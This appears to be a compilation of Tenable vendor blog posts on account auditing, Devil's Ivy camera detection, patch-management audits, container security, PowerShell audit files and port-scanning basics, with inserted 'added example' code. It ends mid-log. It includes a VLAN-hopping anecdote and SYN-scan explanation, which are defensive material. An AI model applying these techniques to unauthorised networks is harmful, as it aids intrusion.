SecurityCenter Continuous View® includes multiple reports, dashboards and Assurance Report Cards® that can help you monitor and evaluate the use of administrative privileges. For example, the CIS CSC Account Monitoring and Control dashboard is quite useful.

Account Monitoring and Control Image

Two components in the lower left of the dashboard are especially useful:

The CIS CSC Account Monitoring and Control dashboard delivers insight into privileged account status and anomalies.

The CSF - Account and Credential Vulnerabilities component displays warning indicators for vulnerabilities related to accounts and credentials. A purple indicator means that one or more vulnerabilities contain the specified keyword. You can drill in to investigate the specifics. I clicked on the Account indicator and discovered that one of my hosts had a guest account with excessive privileges. When I looked at the details, I was informed by plugin 10907 that “Using the supplied credentials, Nessus was able to determine that the 'Guest' user belongs to groups other than 'Guests' (RID 546) or 'Domain Guests' (RID 514). Guest users should not have any additional privileges.”

The CSF - User Access and Least Privilege Compliance Checks component displays results of compliance checks pertaining to areas such as password requirements, lockout policy after failed logins, and controlled use of administrative privileges. You can click on a highlighted indicator in the Host with Fails column to investigate the systems with failed audit checks.

Learn more

Tenable is hosting a webinar on July 12th where we will dive into the CIS control details and show you how Tenable can help. This webinar is the last of a five-part series that explores each of the CIS Foundational Cyber Hygiene controls. Brian Ventura, a SANS community instructor, will be our expert guest presenter. Brian teaches a 2-day course, Critical Security Controls: Planning, Implementing and Auditing. He has also taught a 5-day course, Implementing and Auditing the Critical Security Controls – in Depth. A CyberArk representative will show you how they can help you manage privileged credentials. We will also reserve time for questions and answers.

Please register even if you can’t attend so we can send you a link to the recorded webinar to view at your convenience.

Is the Devil’s Ivy in your Network?


Over the past several years, Tenable has discussed the growing concerns around Internet of Things (IoT) security. With the static nature of IoT devices such as cameras, door sensors, and many more, the ability to correct flaws in third-party libraries becomes increasingly difficult. Yesterday, the researchers at Senrio discovered a serious flaw in the gSOAP library found in many IoT devices, such as the AXIS M3004. Tenable.io and SecurityCenter use active and passive detection methods to identify these vulnerable systems by enumerating the operating systems and detecting versions of vulnerable third-party libraries.

Many manufacturers recommend customers or installers use segmentation strategies when deploying IoT devices to address potential security vulnerabilities. While segmentation is a good plan when deployed correctly, often the installer and IT organizations do not fully test access control methods. For example, the IoT device might be placed in separate Virtual Local Area Networks (VLAN), but the Access Control Lists (ACL) are not fully implemented and tested. I often ran into these issues when performing security assessments and pen-tests. I would go into a network as a normal user and use Nessus to discover all of the live devices on the network. After stumbling onto Industrial Controls Systems (ICS), IP phones, and other devices that are not heavily monitored, I would then clone a MAC address or use some other method to change VLANs and begin to attack the network as if I were an IP Camera. If ACLs were properly implemented, I would quickly find I had no access, but that was seldom the case. Instead, I often found I had more access from the “Segmented VLAN”. This example illustrates why the Devil’s Ivy vulnerability is so dangerous.

Devil's Ivy diagram

Vulnerability Detection

The vulnerability discovered within the gSOAP library is a classic buffer overflow, which allows an attacker to execute arbitrary code. Tenable’s research team developed a new Nessus plugin to detect the affected devices by extracting the banners from services such as FTP and SNMP. The Nessus Network Monitor uses plugins to detect AXIS devices from FTP and SNMP traffic traversing the network:

  • AXIS Camera Detection via FTP (9681)
  • AXIS Camera Detection via SNMP (9683)

Tenable.io Vulnerability Management and Nessus use Plugin 101810 “AXIS Camera gSOAP Message Handling RCE (ACV-116267) (Devil's Ivy)” to identify the vulnerable AXIS systems. The plugin relies on banners from the FTP and SNMP services running on the Axis cameras. In certain cases the plugin can also extract the version by querying the ‘param.cgi’ file on the device. Tenable.io Container Security also detects vulnerable third-party libraries, such as gSOAP, embedded within containerized application workloads.

IoT & AXIS Dashboard

The IoT Device Summary dashboard, available via the SecurityCenter Feed, leverages data from the Tenable sensors to offer insight into IoT-related activity on your network. By adding a subnet, IP address, or asset filter to the components in this dashboard, you can tailor the results to focus on your IoT devices. The dashboard allows you to track IoT device network connections as well as detect IoT cameras by ONVIF-compliant vendor.

IOT Devices Summary Dashboard

Attack Vector

Do not underestimate the seriousness of this vulnerability.

Physical security companies that install and rely on these vulnerable cameras are at potential risk. If the installers fail to apply this patch or fail to secure the VLANs, cyber criminals can use the camera systems to assist in physical compromises. Once the camera systems are compromised, adversaries can reset all of the cameras or load their own version of the operating system. At that point, they have full control over the cameras, which can have serious consequences, including disabling the camera or deleting any captured evidence.

Wrap-Up

Many vulnerabilities can cause a loss to business processes or cause employees to recreate data; however, this vulnerability is the type that often gets easily (mistakenly) dismissed. Vendors often say, “We have a firewall,” and ignore the risks. Devil’s Ivy will be with us for some time as IoT systems are not easily patched.

To prevent this vulnerability from causing damage or revenue loss, Tenable recommends that you properly segment your IoT networks using tightly controlled ACLs and quickly deploy any patches related to the Devil’s Ivy vulnerability.

For more information

Many thanks to the Tenable research team for their contributions to this blog

Auditing Patch Management Solutions with Tenable.io


We receive many questions from customers on how to configure scans to audit their patch management solutions. Whether you have a few hundred or several thousand systems, patch management solutions provide one of the easiest ways to maintain integrity and stability of systems within your network. Unfortunately, no matter what type of solution you are using, or how often you are patching your systems, patches can still fail for a variety of reasons. Issues such as managed clients failing to synchronize, systems offline during a patch cycle, group policy issues and other misconfigurations can leave your systems at risk. Using Tenable.io patch management integrations provides you with an effective way to compare vulnerability results and monitor patch management efforts across the enterprise.

Many organizations use Microsoft’s Windows Server Update Service (WSUS) and System Center Configuration Manager (SCCM) to manage and deploy patches. WSUS is Microsoft’s built-in patch management service that enables organizations to automatically patch vulnerabilities on Windows systems. Organizations often use SCCM to deploy software, monitor systems, and manage devices within the enterprise. SCCM integrates with WSUS by providing more control over scheduling and deployment of patches.

Creating Scans

To audit your patch management solution using Tenable.io, start by selecting the Advanced Scan template. Under the Credentials tab, click on Patch Management, then select the desired Patch Management solution. Enter the IP address of your server along with an administrative account that has access to the patch management server.

Creds 1

Tenable.io only requires patch management credentials to be entered into your scan, so you don’t need to add local credentials for your managed hosts. This option is useful for larger organizations where credentials for managed hosts may not be available. Vulnerability data is collected from the selected patch management solution, and will return a list of outstanding patches that you need to install.

To get a complete look at your patch management solution, we recommend adding credentials for your managed hosts. Nessus will scan each individual host and compare the information being reported by your patch management solution. 

Whether you are auditing your WSUS or SCCM server, there are several plugins that need to be enabled within your scan in order to see results. In addition, you will also need to enable the Windows : Microsoft Bulletins Plugin family.

Required SCCM Plugins

  • Patch Management: SCCM Server Settings (Plugin ID 57029)
  • Patch Management: Missing updates from SCCM (Plugin ID 57030)
  • Patch Management: SCCM Computer Info Initialization (Plugin ID 73636)
  • Patch Management: SCCM Report (Plugin ID 58186)
  • Windows : Microsoft Bulletins Plugin family

Required WSUS Plugins

  • Patch Management: WSUS Server Settings (Plugin ID 57031)
  • Patch Management: Missing updates from WSUS (Plugin ID 57032)
  • Patch Management: WSUS Report (Plugin ID 58133)
  • Windows : Microsoft Bulletins Plugin family

If you have added credentials for your managed hosts into your scan, using the Patch Management Windows Auditing Conflicts plugin will help you quickly detect any patch conflicts being reported. The Patch Report plugin will report on vulnerabilities from third-party software that may not be covered by your existing patch management solution. Enabling the optional plugins will provide valuable information on client versions deployed within your network.

Recommended Plugins

  • Patch Management Windows Auditing Conflicts (Plugin ID 64294)
  • Patch Management Auditing Satisfied (Plugin ID 64295)
  • Patch Report (Plugin ID 66334)

Optional Plugins

  • Microsoft SMS/SCCM Installed (Plugin ID 62028)
  • Microsoft System Center Configuration Manager Client Installed (Plugin ID 55532)
  • Microsoft Windows SMB : WSUS Client Configured (Plugin ID 50859)
  • Windows Server Update Services (WSUS) Detection (Plugin ID 20377)

Once you have selected the appropriate plugins, your output should look similar to the screenshot below.

Plugin list

Results

The patch management feature within Tenable.io enables you to collect information on missing patches reported by patch management solutions. Scan results will include a summary of Windows Bulletins collected from your patch management solution.

SCCM list

Vulnerabilities detected by your patch management solution include a report on the affected hosts and whether each system is vulnerable. Using this information will help to ensure that your patch management software is configured properly and providing accurate information.

SCCM vuln

Results from the Patch Management: SCCM Report (Plugin ID 58186) and the Patch Management: WSUS Report (Plugin ID 58133) plugins will include a report on the status of managed agents, last sync timestamps, patch failures reported and any hosts that are up to date. This information will help you detect potential communication issues between the client and server, as well as any systems that may have fallen out of scope.

Conflicts

Using credentialed scans along with the Patch Management Windows Auditing Conflicts (Plugin ID 64294) plugin will report on any conflicts between Nessus and your patch management solution. If any conflicts are discovered, the plugin will use a “High” severity rating, and include a summary of the Microsoft Bulletins found.

Nessus uses the credentials provided within your scan to log in to each managed host and compare the current patch level status. These results are compared to patch levels collected from SCCM by Nessus, as indicated by “SCCM conflicts.”

The report for each patch and the discrepancies are displayed in the plugin output. Conflicts like this may indicate that the host was not targeted for deployment of a particular patch, so the SCCM server does not detect it as missing.

The example below shows SCCM reporting the MS15-037 patch as missing, while Nessus reports the system as not vulnerable. In this instance, SCCM may be reporting outdated or inaccurate data that should be addressed immediately by your security team.

SCCM to Nessus

Using this data helps to underscore the importance of cross-referencing patches between what is on the system and what the patch management system thinks is on the system.
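As an added example that is not Tenable's code and does not reproduce the plugins' internals, the following Python function performs the same kind of reconciliation described in this section between a patch server's view (SCCM or WSUS) and a credentialed scan's view: it flags conflicts such as the MS15-037 case above, records where both sides agree a patch is missing, and reports unmanaged and stale clients. The host names, bulletins and sync timestamps are constructed.

```python
"""Added example: reconcile patch-server findings with credentialed scan
findings. Data shapes and all sample values below are constructed."""
from datetime import datetime, timedelta

# Constructed: bulletins the patch server reports as missing per managed host,
# plus the last time each client synchronised with the server.
SERVER_REPORT = {
    "ws01": {"missing": {"MS15-037"}, "last_sync": datetime(2017, 7, 10, 8, 0)},
    "ws02": {"missing": {"MS17-010"}, "last_sync": datetime(2017, 7, 10, 9, 15)},
    "ws03": {"missing": set(), "last_sync": datetime(2017, 5, 1, 12, 0)},
    "ws05": {"missing": {"MS17-010"}, "last_sync": datetime(2017, 7, 9, 22, 0)},
}

# Constructed: bulletins a credentialed scan found actually missing per host.
SCAN_REPORT = {
    "ws01": set(),                     # host is patched; server data is stale
    "ws02": {"MS17-010"},              # agrees with the server
    "ws03": {"MS17-010", "MS16-120"},  # server believes it is clean
    "ws04": {"MS17-010"},              # not managed by the server at all
}


def reconcile(server, scan, now, stale_after=timedelta(days=14)):
    """Compare the two views host by host.

    Returns a dict with these lists:
      conflicts  -> (host, bulletin, server_missing, scan_missing) where the
                    two sides disagree; worth a High severity, as the page says
      satisfied  -> (host, bulletin) where both agree the patch is missing
      unmanaged  -> hosts the scan saw but the patch server does not know
      unscanned  -> managed hosts with no credentialed scan result
      stale      -> managed hosts whose last sync is older than stale_after
    """
    result = {"conflicts": [], "satisfied": [], "unmanaged": [],
              "unscanned": [], "stale": []}
    for host in sorted(set(server) | set(scan)):
        if host not in server:
            result["unmanaged"].append(host)
            continue
        if now - server[host]["last_sync"] > stale_after:
            result["stale"].append(host)
        if host not in scan:
            # Without host-level data we cannot confirm or refute the server,
            # so do not report its bulletins as conflicts.
            result["unscanned"].append(host)
            continue
        srv_missing = server[host]["missing"]
        scan_missing = scan[host]
        for bulletin in sorted(srv_missing | scan_missing):
            in_srv = bulletin in srv_missing
            in_scan = bulletin in scan_missing
            if in_srv and in_scan:
                result["satisfied"].append((host, bulletin))
            else:
                result["conflicts"].append((host, bulletin, in_srv, in_scan))
    return result


if __name__ == "__main__":
    report = reconcile(SERVER_REPORT, SCAN_REPORT, now=datetime(2017, 7, 11))
    for host, bulletin, in_srv, in_scan in report["conflicts"]:
        print(f"CONFLICT {host} {bulletin}: server missing={in_srv}, scan missing={in_scan}")
    for host, bulletin in report["satisfied"]:
        print(f"agreed missing on {host}: {bulletin}")
    print("unmanaged:", report["unmanaged"], "unscanned:", report["unscanned"],
          "stale:", report["stale"])
```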

Wrap-Up

Using patch management integrations within Tenable.io helps you monitor patch cycles, improve remediation efforts, and strengthen your overall security posture. Start with your free 60-day trial of Tenable.io Vulnerability Management.

More Questions?

Black Hat Sneak Preview: New Vulnerabilities Exposed in Docker Hub


Community ecosystems with vibrant member support have been the catalyst for faster innovation and shorter software development lifecycles in DevOps. Whether it is downloading code or contributing back to the community, organizations today rely heavily on open source software to drive their business. In fact, modern application development is more about assembling existing packages than writing new code. Developing new code takes time, and in the high-velocity world of DevOps it’s much easier and faster to download open source software and frameworks to get up and running quickly. As the adage goes, it’s better to “stand on the shoulders of giants” than to “reinvent the wheel.”

But this adds tremendous security blind spots if security pros are not working closely with their DevOps counterparts. According to a study conducted by Sonatype, 20 percent of organizations suspected or confirmed breaches related to open source components, which was a 50 percent increase since 2014. In addition, a staggering 50 percent of organizations are not satisfied with their ability to understand known security vulnerabilities in open-source components. Security needs to be embedded early in the software development lifecycle (SDLC) in a non-intrusive way that avoids slowing down developers. Organizations should start thinking of security as another critical test in the build phase.

So how does this relate to application containers?

Containers are the hottest topic in the world of DevOps infrastructure. A container is a self-contained package that has everything required to run an application: libraries, binaries, configuration files and just enough operating system to make it lightweight. Containers allow developers to rapidly progress from build to test to production without any changes to the application across the SDLC. If you haven’t heard of containers before, you probably have heard of Docker, the most popular container image format. 451 Research estimates that 25 percent of enterprises are already using containers today, and Docker adoption is up 40 percent since last year.

Not only have containers become an essential enabling technology for modern application development, but the technology itself relies on open source software for distribution among DevOps teams to build solutions. The most common container distribution today is through Docker Hub, a cloud-based container registry for pre-built, third-party container images. Docker Hub has tremendous community support with over 500,000 Docker container images that have been downloaded over 8 billion times. This community is so pervasive that customers often believe they are building all of their container images in-house when, in reality, the base layers are coming from Docker Hub. With so many developers relying on open source to build containers, how has that affected their organization’s security posture? What is the security exposure caused by downloading Docker Community images and Docker Official images? What can you do to mitigate this risk and secure containers before deployment?

Join me at Black Hat to find out!

On Wednesday, July 26 at 10:20 a.m. PT, I’ll be unveiling new, groundbreaking research analyzing the top 5,000 Docker Community images and all Docker Official images in Docker Hub for vulnerabilities and malware. The research team used Tenable.io Container Security to conduct the analysis, and the results are extremely surprising. The bottom-line is that known vulnerabilities are widespread on Docker Hub. All container registries, images and hosts need to be tested continuously and automatically to eliminate blind spots and reduce exposure risk.

If you’re attending Black Hat, I hope you will join me in the Business Hall Theater A on Level 1 on Wednesday. If you’re looking to seamlessly and securely enable DevOps processes by providing visibility into the security of container images, we invite you to try Tenable.io Container Security for a 60-day free trial.


Cyber Exposure: The Next Frontier for Security


The stakes have never been higher when it comes to cybersecurity. Global cyber attacks such as the recent WannaCry ransomware attack are a sobering reminder that cybersecurity is the existential threat of this generation. A new report from Lloyd’s of London estimates a serious cyber attack could cost the global economy more than $120 billion - as much as catastrophic natural disasters such as Hurricanes Katrina and Sandy. According to the report, the most likely scenario is a malicious hack that would take down a cloud service provider, at an estimated loss of $53 billion. With all of the attention and the hundreds of vendors in the security industry, why are we still in this same situation, with it only getting worse and more severe?

The reality is these "future" technologies and compute platforms, such as IoT and cloud, are no longer the future. They are here and now. This means the cyber attack surface is no longer a laptop or a server in a data center. According to Business Intelligence, there will be nine billion active IoT devices in the enterprise by 2019. That’s more than the entire smartphone and tablet markets combined. According to a 2016 IDG Enterprise Cloud Computing Survey, 70 percent of organizations already have apps in the cloud and 16 percent will in 12 months. We’re also seeing development shifts such as DevOps become mainstream, and with that comes the rise of containers and microservices as a way to make changes to smaller parts of the application in a more agile way. According to 451 Research, the container market is the fastest growing market of cloud-enabling technologies, with a CAGR of 40 percent through 2020, growing from $762 million to $2.7 billion by 2020.

So What Do We Do in Response?

We throw hundreds of tools at the problem, each designed to protect the organization from a niche, often advanced "threat of the week" style attack. We have Configuration Management Databases (CMDBs) which give the organization an IT view of assets and configurations, but they weren’t built to keep pace with modern assets and aren’t a security view. Vulnerability Management (VM) technologies are used by most organizations to scan the network to identify issues, but the problem with legacy VM tools is that they take a "one size fits all" approach designed for the world of client/server and on-premise data centers, and only assess "known" assets that are running at the time of the scan or that can have an agent deployed on them.

We are in the new, modern world of IoT, cloud, SaaS, mobile and DevOps, which means organizations need to approach understanding their cyber risk in a way that adapts to this new world of modern assets. For example, IoT and mobile devices may be undetectable with traditional tools, and containers and cloud workloads, as opposed to other types of assets that live for months to years, may live for only minutes to hours, making them extremely hard to see and protect. There is also safety-critical infrastructure and Operational Technology like Industrial Control Systems, which are a rising attack vector. These systems were designed to be walled off from the network and isolated from threats, and therefore were not designed for frequent change or software deployments. As software permeates every industry, these Industrial IoT devices, which are now connected devices, need to be protected, but the old way is too intrusive.

Welcome to the Era of Modern Cyber Exposure

We believe that Cyber Exposure is the next frontier for empowering organizations to accurately understand, represent and ultimately reduce their cyber risk against the rapidly changing modern attack surface. Cyber Exposure transforms security from a static or fragmented view to live and holistic visibility across every asset - whether that’s IoT or traditional IT devices, cloud infrastructure or Industrial Control Systems. From this live picture you can then start to accurately assess and analyze these assets for areas of exposure. This could be misconfigurations, but it could also be other hygiene-type health indicators such as out-of-date antivirus or flagging high-risk users. By correlating this information with additional data sources, such as a CMDB or threat intelligence, you can get a more complete picture of the business criticality and severity of the issue to prioritize remediation and work with IT to fix it.

Cyber Exposure is analogous to IT Service Management and how the execution of ITSM processes is supported with specialized software technology. At the core of ITSM software suites are a workflow management system (service desk) for managing incidents and maintaining a knowledge base system of record, and a Configuration Management Database (CMDB) for discovering and mapping Configuration Items and their dependencies. Bringing these technologies together creates an intuitive way to link incidents with change and service requests, and also provides a view of business services and the underlying IT infrastructure to help accelerate troubleshooting and change impact analysis, for example. Just as ITSM provides a process for planning, delivering and operating IT services to better support customers, Cyber Exposure provides a discipline and a process for managing and measuring cyber risk against the modern attack surface. This will help security and IT teams collaborate to more effectively and efficiently identify and resolve issues, and will also provide an objective way for the CISO, CIO and the business to measure cyber risk and use it for strategic decisions and planning. Cyber Exposure technologies will provide the data, visualization, process management and metrics to help drive a new way to manage security: reducing risk, making better business decisions and actually enabling digital transformation instead of being the impediment to it.

Communicating Cyber Risk to the Board

There has also been a lot of conversation around cybersecurity awareness and readiness within the C-suite and the board of directors: how do you represent and communicate cyber risk in non-technical, business terms? Today the CISO has to translate a mountain of data in multiple spreadsheets into intuitive insights the business can use to make decisions. Cyber Exposure will help the CISO drive a new level of dialogue with the business. If you know which areas of your business are secure - or exposed - and you can measure your organization against a larger set of data, this opens up a whole new set of discussions and decisions about where the organization needs to focus, how much and where to invest to reduce risk to an acceptable amount, and how to drive strategic business decisions. Every function has its organizational system of record to manage, measure and predict the business exposure relevant to that function: for example, CRM for revenue and forecasting exposure, ERP for financial and supply chain exposure and Human Capital Management (HCM) for employee satisfaction and attrition exposure. Imagine a future where every strategic business decision factors in Cyber Exposure data as a key risk metric, just as the business does with all of these other types of exposure. We believe that future doesn’t need to be in the future.

We’re excited to apply our years of expertise and knowledge in understanding assets, networks and vulnerabilities to usher in this new modern era of Cyber Exposure. And we’re just getting started...

Happy SysAdmin Day 2017

Having a background as a system administrator, I know first-hand many of the challenges you face. As every organization has a unique set of business requirements, system administrators work hard behind the scenes to keep operations running smoothly. From managing permission changes, recovering important files and monitoring user accounts, many system administrators utilize scripts to automate and manage routine tasks. Tenable.io includes over 450 pre-built audit policies and allows you to incorporate custom audit files. Custom audit files provide a great way for you to monitor routine events and changes, while making your work a little easier.

The Problem

On a daily basis, organizations can generate thousands of events, and keeping track of these events across multiple systems can be difficult to manage effectively. System administrators often access multiple web interfaces or consoles to manage systems within their environment. In addition, many are also responsible for maintaining compliance, managing access permissions, and ensuring corporate policies are followed.

Scripts are often used in combination with other security devices to help system administrators monitor critical events or issues that need to be addressed. Unfortunately, no matter what you use to monitor your network, many of these solutions won’t provide the complete visibility you need to sort through all of the events and activity within your network.

By leveraging custom audit files within Tenable.io, you can easily keep track of unique or critical events within one interface. You can customize scripts based on your organizational requirements that can help to ensure service availability and protect data integrity. Tenable.io provides you with the critical insight needed to stay one step ahead of activity that could impact network security or business operations.

Monitoring Account Changes

Many organizations today are required to ensure compliance with corporate policies, as well as industry regulations. Controls requiring password changes and monitoring inactive accounts are often included within many well-known frameworks such as NIST, HIPAA, and PCI DSS.

We have also recently had several questions from customers who wanted to monitor user account changes within Active Directory. I decided to use my lab environment and test out a solution. Within my lab environment, I created several PowerShell scripts to find inactive user accounts and password changes within the domain. These controls help to prevent account compromise and reduce the risk of attackers accessing critical systems or data.

Using PowerShell with Tenable.io

Tenable.io has the ability to run compliance checks using PowerShell cmdlets. The compliance checks use the arguments supplied within a custom audit file and run “powershell.exe” on the remote server. Results include either the raw command output or a comparison of the output against the value data specified in the file. PowerShell is Microsoft’s built-in scripting language designed for system administration tasks. Using credentialed scans, Tenable.io leverages PowerShell scripts placed within custom audit files to collect information on event changes and activity within your network.

Monitor User Accounts

Since I’m going to be querying Active Directory, I start by importing the Active Directory Module for PowerShell. Using the Get-ADUser cmdlet, I created a script to retrieve a list of user accounts and when each password was last set. With this cmdlet, you can modify the script to include either active or inactive accounts, and track changes across specific Organizational Units (OUs) or other domains within your forest.

This information can also be used by executives to confirm if corporate security policies are being followed or need to be improved. If your organization has an internal policy to remove inactive accounts after a specific time period, using this data can help you ensure compliance requirements are being met.
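The two queries described above, written out as an added example (this is not the script from the post, and not Tenable code). It assumes the ActiveDirectory module is installed on the host running it, and the OU path and the 90-day thresholds are placeholder values to be replaced with your own policy:

```powershell
# Added example, not code from the Tenable post: report enabled AD users whose
# password is older than a policy threshold, plus accounts with no recent logon.
# The OU and the thresholds are assumed values; adjust them to your own policy.
Import-Module ActiveDirectory

$PasswordMaxAgeDays = 90                                # assumed policy value
$InactiveDays       = 90                                # assumed policy value
$SearchBase         = 'OU=Corp Users,DC=example,DC=com' # hypothetical OU

function Get-StalePasswordUser {
    param([int]$MaxAgeDays, [string]$Base)
    $cutoff = (Get-Date).AddDays(-$MaxAgeDays)
    # Enabled users whose password was set before the cutoff, or never set at all.
    # PasswordNeverExpires is included because such accounts never trip the
    # domain's own maximum-age policy and need a manual decision.
    Get-ADUser -Filter 'Enabled -eq $true' -SearchBase $Base `
               -Properties PasswordLastSet, PasswordNeverExpires, LastLogonDate |
        Where-Object { $null -eq $_.PasswordLastSet -or $_.PasswordLastSet -lt $cutoff } |
        Select-Object SamAccountName, PasswordLastSet, PasswordNeverExpires, LastLogonDate |
        Sort-Object PasswordLastSet
}

function Get-InactiveUser {
    param([int]$Days, [string]$Base)
    # Search-ADAccount works from lastLogonTimestamp, which replicates between
    # domain controllers with up to about 14 days of lag, so treat this as a
    # screening list rather than an exact logon history.
    Search-ADAccount -AccountInactive -TimeSpan ([TimeSpan]::FromDays($Days)) `
                     -UsersOnly -SearchBase $Base |
        Where-Object { $_.Enabled } |
        Select-Object SamAccountName, LastLogonDate, Enabled |
        Sort-Object LastLogonDate
}

"== Enabled users with a password older than $PasswordMaxAgeDays days =="
Get-StalePasswordUser -MaxAgeDays $PasswordMaxAgeDays -Base $SearchBase | Format-Table -AutoSize

"== Enabled users with no logon in $InactiveDays days =="
Get-InactiveUser -Days $InactiveDays -Base $SearchBase | Format-Table -AutoSize
```

Both functions return objects rather than text, so the same script can feed a CSV export for the compliance report described above, or be piped through Out-String when its output is collected by an audit check.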

Tenable.io also supports the use of PowerShell script files within your custom audit file. The Nessus User Guide includes a detailed section on how to set up and configure your custom audit file with PowerShell.

Create Custom Audit File

In my custom audit file, I’m using if/then logic to first check whether the target system is a domain controller and then run each audit check. Since I’m going to audit my domain controller, the WMI_POLICY check provides an initial test that the target system is either a Primary or Backup domain controller.

<custom_item>
  type          : WMI_POLICY
  description   : "Target is a Domain Controller"
  wmi_namespace : "root/CIMV2"
  wmi_request   : "select DomainRole from Win32_ComputerSystem"
  wmi_attribute : "DomainRole"
  wmi_key       : "DomainRole"
  value_type    : POLICY_DWORD
  value_data    : 4 || 5
</custom_item>

Next, I used the AUDIT_POWERSHELL check and added the PowerShell commands I ran previously. The description value should include the appropriate plugin name, and the powershell_args value should contain the PowerShell command. This check can also run PowerShell .ps1 files.

<custom_item>
  type                 : AUDIT_POWERSHELL
  description          : "<Plugin Name>"
  value_type           : POLICY_TEXT
  powershell_args      : "<PowerShell command>"
  value_data           : "MANUAL REVIEW REQUIRED"
  severity             : MEDIUM
  only_show_cmd_output : YES
</custom_item>

The compliance check parser lets you add multiple audit checks within your custom audit file. Once your custom audit file is complete, save it with the .audit extension.
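Assembled into one file, with the if/then wrapper the post describes, the two checks look like this. This is an added example rather than the author’s own audit file: the group policy name and the two inactive-account and password-age commands are mine, chosen so that no shell-special characters appear inside the quoted powershell_args values.

```text
<check_type:"Windows" version:"2">
<group_policy:"AD account hygiene (added example)">

<if>
  <condition type:"AND">
    <custom_item>
      type          : WMI_POLICY
      description   : "Target is a Domain Controller"
      wmi_namespace : "root/CIMV2"
      wmi_request   : "select DomainRole from Win32_ComputerSystem"
      wmi_attribute : "DomainRole"
      wmi_key       : "DomainRole"
      value_type    : POLICY_DWORD
      value_data    : 4 || 5
    </custom_item>
  </condition>
  <then>
    <custom_item>
      type                 : AUDIT_POWERSHELL
      description          : "AD users inactive for 90 days (manual review)"
      value_type           : POLICY_TEXT
      powershell_args      : "Import-Module ActiveDirectory; Search-ADAccount -AccountInactive -TimeSpan 90.00:00:00 -UsersOnly | Select-Object SamAccountName, LastLogonDate, Enabled | Sort-Object LastLogonDate | Format-Table -AutoSize | Out-String"
      value_data           : "MANUAL REVIEW REQUIRED"
      severity             : MEDIUM
      only_show_cmd_output : YES
    </custom_item>
    <custom_item>
      type                 : AUDIT_POWERSHELL
      description          : "AD users by password last set date (manual review)"
      value_type           : POLICY_TEXT
      powershell_args      : "Import-Module ActiveDirectory; Get-ADUser -Filter * -Properties PasswordLastSet | Select-Object SamAccountName, PasswordLastSet | Sort-Object PasswordLastSet | Format-Table -AutoSize | Out-String"
      value_data           : "MANUAL REVIEW REQUIRED"
      severity             : MEDIUM
      only_show_cmd_output : YES
    </custom_item>
  </then>
  <else>
    <report type:"PASSED">
      description : "Target is not a Domain Controller; AD account checks skipped"
    </report>
  </else>
</if>

</group_policy>
</check_type>
```

The else branch reports a pass on non-domain-controllers so that a policy applied to a mixed Windows scan does not produce misleading failures on member servers.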

Results

Using the Policy Compliance Auditing scan template, I added my custom audit file and credentials for the domain controller. Completed results are located under the Compliance tab within the scan and include the name of each check performed. Since we are auditing a Windows system, results are listed within the Windows Compliance Checks plugin family.

Tenable.io Scan

Each result will look identical to the results posted earlier within PowerShell command line sessions. If you need to add more information, you can always modify your custom audit file to include the specific attributes you need based on your organizational requirements.

Password changes

Summary

User accounts are one of the easiest ways for attackers to gain access to your network systems and data. Once an account is compromised, attackers can pivot and target critical systems, obtain confidential data, and remain in your network for days, weeks or even months.

These examples are just a small portion of what custom audit files can do for you. Whether you want to obtain additional information from Active Directory, monitor file and folder changes or track local account activity, using custom audit files provides you with countless ways to automate routine tasks and know what’s going on within your network.

I hope these tips help. And Happy SysAdmin Day to my fellow fearless colleagues!

Have More Questions?

Tenable Internship Takeaways: Understanding Different Port Scanning Techniques

As a summer intern for the research and development department at Tenable, I was surprised when my manager gave me a relatively straightforward first task: find every machine in the lab. I knew that some form of port scan was needed. Maybe I could start with a ping sweep of some IP range, or maybe something more comprehensive. But my manager also added some nuance to the project. I had to put myself in the shoes of a Tenable customer, and my objective was to present a plan to discover machines and to identify the Cyber Exposure risk on the lab network using Tenable.io. The first step was to define the network subnets, and then I had to scan the networks for vulnerabilities.

TCP Handshaking

TCP and SYN are two methods that stem from the concept of TCP handshaking. When two computers communicate over TCP/IP, flags are set on the TCP layer of a packet. TCP flags are a set of bits in the header that indicate how a packet should be handled by the receiver. Some important flags to remember are SYN (synchronize), ACK (acknowledge), RST (reset) and FIN (no more data to send). In TCP handshaking, one computer sends a packet with the SYN flag, initiating the connection to the server. The server responds with a packet with the SYN and ACK flags set, acknowledging the first computer’s request to connect. If the connection is refused because the port is closed, the server responds with an RST packet. In response to the SYN/ACK packet, the first computer acknowledges with an ACK packet, completing the TCP connection. When the conversation is over, a FIN packet is sent, signaling the end of the conversation. We can leverage this information to understand what ports are open on a computer.

TCP Scanning vs SYN Scanning

The handshaking method is a simple way to see whether a port is open on a computer. If the connection with the target machine is completed, then the port is open. If not, then the port is either closed or the packets are being filtered by a firewall. Depending on the firewall configurations, the scanner may receive an error message or no response at all. This method is aptly named TCP Scanning.

A SYN scan works under the assumption that if a computer receives a SYN/ACK packet from a target, then that port is open, because otherwise the scanning computer would have received an RST packet. So, if a port responds to an initial SYN packet with a SYN/ACK packet, the scanning computer sends an RST packet and moves to the next port. If the target computer responds to the initial SYN packet with an RST packet, then the port is closed. This scan is often called “stealthy” because the scanner never completes a TCP connection. However, “stealthy” is a relative term in this case: if a wide port range is probed, the scanner’s IP address will stand out in the network traffic logs. Further, most modern Intrusion Detection Systems (IDS) and firewalls can detect a SYN scan.
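The point that a scanning host stands out in traffic logs can be shown from the defender’s side. The following is an added example, not from the post: it parses Windows Firewall log entries (the pfirewall.log text format) and reports any source that sends lone SYNs, the first packet of both a TCP connect scan and a SYN scan, to many distinct ports within a short window. The log lines are constructed sample data; with them, only 192.0.2.10 is reported, while 192.0.2.20, which only ever reaches port 443, is not.

```powershell
# Added example, not from the Tenable post: spot a port sweep in Windows
# Firewall (pfirewall.log) entries. The log lines below are constructed sample
# data: 192.0.2.10 sends a lone SYN to 12 different ports in ten seconds,
# while 192.0.2.20 only talks to port 443 at a normal pace.
$SampleLog = @'
#Version: 1.5
#Software: Microsoft Windows Firewall
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2017-07-27 10:15:00 DROP TCP 192.0.2.10 198.51.100.5 51234 21 52 S 1001 0 65535 - - - RECEIVE
2017-07-27 10:15:01 DROP TCP 192.0.2.10 198.51.100.5 51235 22 52 S 1002 0 65535 - - - RECEIVE
2017-07-27 10:15:01 DROP TCP 192.0.2.10 198.51.100.5 51236 23 52 S 1003 0 65535 - - - RECEIVE
2017-07-27 10:15:02 DROP TCP 192.0.2.10 198.51.100.5 51237 25 52 S 1004 0 65535 - - - RECEIVE
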